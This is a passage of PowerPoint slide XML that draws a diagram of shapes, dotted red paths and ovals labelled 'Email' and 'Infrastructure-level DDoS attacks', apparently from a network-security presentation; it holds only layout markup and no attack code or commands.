                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Email</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6170" name="Text Box 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC8010D8-7246-480D-8684-D6C5BE0A17BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4038600" y="39624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200" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Infrastructure-level DDoS attacks</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6171" name="Freeform 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F8C1F5B-0776-46EB-968F-7D6013B044CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1962150" y="1798638"/>
            <a:ext cx="5176838" cy="2998787"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 3261"/>
              <a:gd name="T1" fmla="*/ 0 h 1889"/>
              <a:gd name="T2" fmla="*/ 2147483646 w 3261"/>
              <a:gd name="T3" fmla="*/ 2147483646 h 1889"/>
              <a:gd name="T4" fmla="*/ 2147483646 w 3261"/>
              <a:gd name="T5" fmla="*/ 2147483646 h 1889"/>
              <a:gd name="T6" fmla="*/ 2147483646 w 3261"/>
              <a:gd name="T7" fmla="*/ 2147483646 h 1889"/>
              <a:gd name="T8" fmla="*/ 2147483646 w 3261"/>
              <a:gd name="T9" fmla="*/ 2147483646 h 1889"/>
              <a:gd name="T10" fmla="*/ 2147483646 w 3261"/>
              <a:gd name="T11" fmla="*/ 2147483646 h 1889"/>
              <a:gd name="T12" fmla="*/ 2147483646 w 3261"/>
              <a:gd name="T13" fmla="*/ 2147483646 h 1889"/>
              <a:gd name="T14" fmla="*/ 2147483646 w 3261"/>
              <a:gd name="T15" fmla="*/ 2147483646 h 1889"/>
              <a:gd name="T16" fmla="*/ 2147483646 w 3261"/>
              <a:gd name="T17" fmla="*/ 2147483646 h 18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61"/>
              <a:gd name="T28" fmla="*/ 0 h 1889"/>
              <a:gd name="T29" fmla="*/ 3261 w 3261"/>
              <a:gd name="T30" fmla="*/ 1889 h 18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61" h="1889">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="156" y="240"/>
                  <a:pt x="701" y="1141"/>
                  <a:pt x="919" y="1440"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1137" y="1739"/>
                  <a:pt x="1230" y="1733"/>
                  <a:pt x="1308" y="1795"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1386" y="1857"/>
                  <a:pt x="1353" y="1801"/>
                  <a:pt x="1384" y="1812"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1415" y="1823"/>
                  <a:pt x="1461" y="1850"/>
                  <a:pt x="1495" y="1858"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1529" y="1866"/>
                  <a:pt x="1562" y="1853"/>
                  <a:pt x="1588" y="1858"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1614" y="1863"/>
                  <a:pt x="1596" y="1889"/>
                  <a:pt x="1653" y="1886"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1710" y="1883"/>
                  <a:pt x="1664" y="1865"/>
                  <a:pt x="1932" y="1840"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2200" y="1815"/>
                  <a:pt x="2984" y="1759"/>
                  <a:pt x="3261" y="1738"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="63500" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:prstDash val="sysDot"/>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6172" name="Group 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E7F3DDEA-0105-473D-929D-ACA46272EBA3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3486150" y="2020888"/>
            <a:ext cx="3725863" cy="2576512"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="2347" cy="1623"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="185402" name="Freeform 29">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0FF91AB7-536C-49CB-A812-F44D6FA0BC73}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="2347" cy="1623"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 1390 w 2347"/>
                <a:gd name="T1" fmla="*/ 0 h 1623"/>
                <a:gd name="T2" fmla="*/ 1500 w 2347"/>
                <a:gd name="T3" fmla="*/ 263 h 1623"/>
                <a:gd name="T4" fmla="*/ 204 w 2347"/>
                <a:gd name="T5" fmla="*/ 1223 h 1623"/>
                <a:gd name="T6" fmla="*/ 275 w 2347"/>
                <a:gd name="T7" fmla="*/ 1486 h 1623"/>
                <a:gd name="T8" fmla="*/ 535 w 2347"/>
                <a:gd name="T9" fmla="*/ 1607 h 1623"/>
                <a:gd name="T10" fmla="*/ 2347 w 2347"/>
                <a:gd name="T11" fmla="*/ 1579 h 1623"/>
                <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                <a:gd name="T15" fmla="*/ 0 60000 65536"/>
                <a:gd name="T16" fmla="*/ 0 60000 65536"/>
                <a:gd name="T17" fmla="*/ 0 60000 65536"/>
                <a:gd name="T18" fmla="*/ 0 w 2347"/>
                <a:gd name="T19" fmla="*/ 0 h 1623"/>
                <a:gd name="T20" fmla="*/ 2347 w 2347"/>
                <a:gd name="T21" fmla="*/ 1623 h 1623"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T12">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T13">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T14">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="T15">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="T16">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
                <a:cxn ang="T17">
                  <a:pos x="T10" y="T11"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T18" t="T19" r="T20" b="T21"/>
              <a:pathLst>
                <a:path w="2347" h="1623">
                  <a:moveTo>
                    <a:pt x="1390" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1408" y="39"/>
                    <a:pt x="1698" y="59"/>
                    <a:pt x="1500" y="263"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1302" y="467"/>
                    <a:pt x="408" y="1019"/>
                    <a:pt x="204" y="1223"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="1427"/>
                    <a:pt x="220" y="1422"/>
                    <a:pt x="275" y="1486"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="330" y="1550"/>
                    <a:pt x="190" y="1591"/>
                    <a:pt x="535" y="1607"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="880" y="1623"/>
                    <a:pt x="1970" y="1585"/>
                    <a:pt x="2347" y="1579"/>
                  </a:cubicBezTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:noFill/>
            <a:ln w="63500" cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:prstDash val="sysDot"/>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03" name="Freeform 30">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C1F6780-FF27-4E90-BB3F-E41E9E631E19}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1500" y="7"/>
              <a:ext cx="384" cy="256"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 384 w 384"/>
                <a:gd name="T1" fmla="*/ 160 h 256"/>
                <a:gd name="T2" fmla="*/ 240 w 384"/>
                <a:gd name="T3" fmla="*/ 16 h 256"/>
                <a:gd name="T4" fmla="*/ 0 w 384"/>
                <a:gd name="T5" fmla="*/ 256 h 256"/>
                <a:gd name="T6" fmla="*/ 0 60000 65536"/>
                <a:gd name="T7" fmla="*/ 0 60000 65536"/>
                <a:gd name="T8" fmla="*/ 0 60000 65536"/>
                <a:gd name="T9" fmla="*/ 0 w 384"/>
                <a:gd name="T10" fmla="*/ 0 h 256"/>
                <a:gd name="T11" fmla="*/ 384 w 384"/>
                <a:gd name="T12" fmla="*/ 256 h 256"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T6">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T7">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T8">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T9" t="T10" r="T11" b="T12"/>
              <a:pathLst>
                <a:path w="384" h="256">
                  <a:moveTo>
                    <a:pt x="384" y="160"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="344" y="80"/>
                    <a:pt x="304" y="0"/>
                    <a:pt x="240" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="176" y="32"/>
                    <a:pt x="88" y="144"/>
                    <a:pt x="0" y="256"/>
                  </a:cubicBezTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:noFill/>
            <a:ln w="63500" cmpd="sng">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175" name="Oval 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8E90B25-84A0-452A-9943-BC6C63595194}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3810000" y="4343400"/>
            <a:ext cx="685800" cy="571500"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFCC99">
              <a:alpha val="50195"/>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6176" name="Oval 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C122EC3F-125A-4649-B9A7-FEC4CD5E7971}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3352800" y="3733800"/>
            <a:ext cx="685800" cy="571500"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFCC99">
              <a:alpha val="50195"/>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6177" name="Oval 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FAB0149E-8131-438A-8FC9-745525AF431D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5368925" y="4386263"/>
            <a:ext cx="574675" cy="490537"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFCC99">
              <a:alpha val="50195"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="6178" name="Group 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F887640-A7E9-44D6-9EEB-49AAE20B99B1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="528638" y="4137025"/>
            <a:ext cx="6557962" cy="1909763"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="4131" cy="1203"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="185400" name="Freeform 35">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AFAB9FBD-5F52-4397-A3AE-FAF4BEA54F33}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="4131" cy="1203"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 159 w 4131"/>
                <a:gd name="T1" fmla="*/ 1082 h 1203"/>
                <a:gd name="T2" fmla="*/ 195 w 4131"/>
                <a:gd name="T3" fmla="*/ 1077 h 1203"/>
                <a:gd name="T4" fmla="*/ 1330 w 4131"/>
                <a:gd name="T5" fmla="*/ 328 h 1203"/>
                <a:gd name="T6" fmla="*/ 1794 w 4131"/>
                <a:gd name="T7" fmla="*/ 21 h 1203"/>
                <a:gd name="T8" fmla="*/ 2211 w 4131"/>
                <a:gd name="T9" fmla="*/ 453 h 1203"/>
                <a:gd name="T10" fmla="*/ 4131 w 4131"/>
                <a:gd name="T11" fmla="*/ 357 h 1203"/>
                <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                <a:gd name="T15" fmla="*/ 0 60000 65536"/>
                <a:gd name="T16" fmla="*/ 0 60000 65536"/>
                <a:gd name="T17" fmla="*/ 0 60000 65536"/>
                <a:gd name="T18" fmla="*/ 0 w 4131"/>
                <a:gd name="T19" fmla="*/ 0 h 1203"/>
                <a:gd name="T20" fmla="*/ 4131 w 4131"/>
                <a:gd name="T21" fmla="*/ 1203 h 1203"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T12">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T13">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T14">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="T15">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="T16">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
                <a:cxn ang="T17">
                  <a:pos x="T10" y="T11"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T18" t="T19" r="T20" b="T21"/>
              <a:pathLst>
                <a:path w="4131" h="1203">
                  <a:moveTo>
                    <a:pt x="159" y="1082"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="168" y="1081"/>
                    <a:pt x="0" y="1203"/>
                    <a:pt x="195" y="1077"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="390" y="951"/>
                    <a:pt x="1063" y="504"/>
                    <a:pt x="1330" y="328"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1597" y="152"/>
                    <a:pt x="1647" y="0"/>
                    <a:pt x="1794" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1941" y="42"/>
                    <a:pt x="1822" y="397"/>
                    <a:pt x="2211" y="453"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2600" y="509"/>
                    <a:pt x="3367" y="429"/>
                    <a:pt x="4131" y="357"/>
                  </a:cubicBezTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:noFill/>
            <a:ln w="63500" cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:prstDash val="sysDot"/>
              <a:miter lim="800000"/>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401" name="Freeform 36">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{962A3872-1950-4277-9301-FB73E321EC01}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1971" y="346"/>
              <a:ext cx="256" cy="504"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 13937 w 208"/>
                <a:gd name="T1" fmla="*/ 72 h 504"/>
                <a:gd name="T2" fmla="*/ 27904 w 208"/>
                <a:gd name="T3" fmla="*/ 72 h 504"/>
                <a:gd name="T4" fmla="*/ 0 w 208"/>
                <a:gd name="T5" fmla="*/ 504 h 504"/>
                <a:gd name="T6" fmla="*/ 0 60000 65536"/>
                <a:gd name="T7" fmla="*/ 0 60000 65536"/>
                <a:gd name="T8" fmla="*/ 0 60000 65536"/>
                <a:gd name="T9" fmla="*/ 0 w 208"/>
                <a:gd name="T10" fmla="*/ 0 h 504"/>
                <a:gd name="T11" fmla="*/ 208 w 208"/>
                <a:gd name="T12" fmla="*/ 504 h 504"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T6">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T7">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T8">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T9" t="T10" r="T11" b="T12"/>
              <a:pathLst>
                <a:path w="208" h="504">
                  <a:moveTo>
                    <a:pt x="96" y="72"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="152" y="36"/>
                    <a:pt x="208" y="0"/>
                    <a:pt x="192" y="72"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="176" y="144"/>
                    <a:pt x="88" y="324"/>
                    <a:pt x="0" y="504"/>
                  </a:cubicBezTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:noFill/>
            <a:ln w="63500" cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:prstDash val="sysDot"/>
              <a:miter lim="800000"/>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p:sp>
        <p:nvSpPr>
          <p:cNvPr id="185363" name="Line 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D8E472C-2829-478D-8F27-428D784C1B2E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="3884613" y="4826000"/>
            <a:ext cx="193675" cy="520700"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="85725">
            <a:solidFill>
              <a:srgbClr val="F7F7F7"/>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185364" name="Group 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1EF8316-4C98-438F-B6D2-A672C16B5E68}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3832225" y="5287963"/>
            <a:ext cx="434975" cy="701675"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="274" cy="442"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="185390" name="Freeform 39">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF512C2A-2055-48B9-AF99-1D48C9601A21}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="0" y="66"/>
              <a:ext cx="188" cy="376"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 188 w 188"/>
                <a:gd name="T1" fmla="*/ 37 h 376"/>
                <a:gd name="T2" fmla="*/ 0 w 188"/>
                <a:gd name="T3" fmla="*/ 0 h 376"/>
                <a:gd name="T4" fmla="*/ 0 w 188"/>
                <a:gd name="T5" fmla="*/ 340 h 376"/>
                <a:gd name="T6" fmla="*/ 188 w 188"/>
                <a:gd name="T7" fmla="*/ 376 h 376"/>
                <a:gd name="T8" fmla="*/ 188 w 188"/>
                <a:gd name="T9" fmla="*/ 37 h 376"/>
                <a:gd name="T10" fmla="*/ 188 w 188"/>
                <a:gd name="T11" fmla="*/ 37 h 376"/>
                <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                <a:gd name="T15" fmla="*/ 0 60000 65536"/>
                <a:gd name="T16" fmla="*/ 0 60000 65536"/>
                <a:gd name="T17" fmla="*/ 0 60000 65536"/>
                <a:gd name="T18" fmla="*/ 0 w 188"/>
                <a:gd name="T19" fmla="*/ 0 h 376"/>
                <a:gd name="T20" fmla="*/ 188 w 188"/>
                <a:gd name="T21" fmla="*/ 376 h 376"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T12">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T13">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T14">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="T15">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="T16">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
                <a:cxn ang="T17">
                  <a:pos x="T10" y="T11"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T18" t="T19" r="T20" b="T21"/>
              <a:pathLst>
                <a:path w="188" h="376">
                  <a:moveTo>
                    <a:pt x="188" y="37"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="340"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="188" y="376"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="188" y="37"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="6366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1" name="Freeform 40">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9655B9AC-065E-494E-81E3-D12AD075585F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="188" y="37"/>
              <a:ext cx="86" cy="405"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 86"/>
                <a:gd name="T1" fmla="*/ 66 h 405"/>
                <a:gd name="T2" fmla="*/ 86 w 86"/>
                <a:gd name="T3" fmla="*/ 0 h 405"/>
                <a:gd name="T4" fmla="*/ 86 w 86"/>
                <a:gd name="T5" fmla="*/ 340 h 405"/>
                <a:gd name="T6" fmla="*/ 0 w 86"/>
                <a:gd name="T7" fmla="*/ 405 h 405"/>
                <a:gd name="T8" fmla="*/ 0 w 86"/>
                <a:gd name="T9" fmla="*/ 66 h 405"/>
                <a:gd name="T10" fmla="*/ 0 w 86"/>
                <a:gd name="T11" fmla="*/ 66 h 405"/>
                <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                <a:gd name="T15" fmla="*/ 0 60000 65536"/>
                <a:gd name="T16" fmla="*/ 0 60000 65536"/>
                <a:gd name="T17" fmla="*/ 0 60000 65536"/>
                <a:gd name="T18" fmla="*/ 0 w 86"/>
                <a:gd name="T19" fmla="*/ 0 h 405"/>
                <a:gd name="T20" fmla="*/ 86 w 86"/>
                <a:gd name="T21" fmla="*/ 405 h 405"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T12">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T13">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T14">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="T15">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="T16">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
                <a:cxn ang="T17">
                  <a:pos x="T10" y="T11"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T18" t="T19" r="T20" b="T21"/>
              <a:pathLst>
                <a:path w="86" h="405">
                  <a:moveTo>
                    <a:pt x="0" y="66"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="86" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
